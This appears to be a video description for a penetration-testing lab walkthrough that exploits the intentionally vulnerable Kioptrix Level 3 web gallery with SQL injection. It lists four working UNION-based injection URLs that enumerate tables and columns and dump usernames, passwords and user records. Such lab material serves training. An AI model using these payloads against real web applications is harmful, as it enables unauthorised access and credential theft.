Description: In this video I will show you how to exploit Kioptrix Level 3 Web-Application using SQL-Injection.
Kioptrix is a vulnerable web Application for penetration testing.
In this demo I will cover how to exploit a web using sql-injection and finding Web admin password.
http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6
http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name="dev_accounts"),4,5,6
http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(id, 0x3A, username, 0x3A, password, 0x0A) from dev_accounts),4,5,6
http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(userid, 0x3A, username, 0x3A, password, 0x3A, usertype, 0x3A, firstname, 0x3A, lastname, 0x3A, email, 0x3A, website, 0x3A, issuperuser, 0x3A, joincode) from gallarific_users),4,5,6
Source : - http://lanmaster53.com/2011/05/kioptrix-level-3-notes-spoiler-alert/
Tags: sql-injection , hacking , hack ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.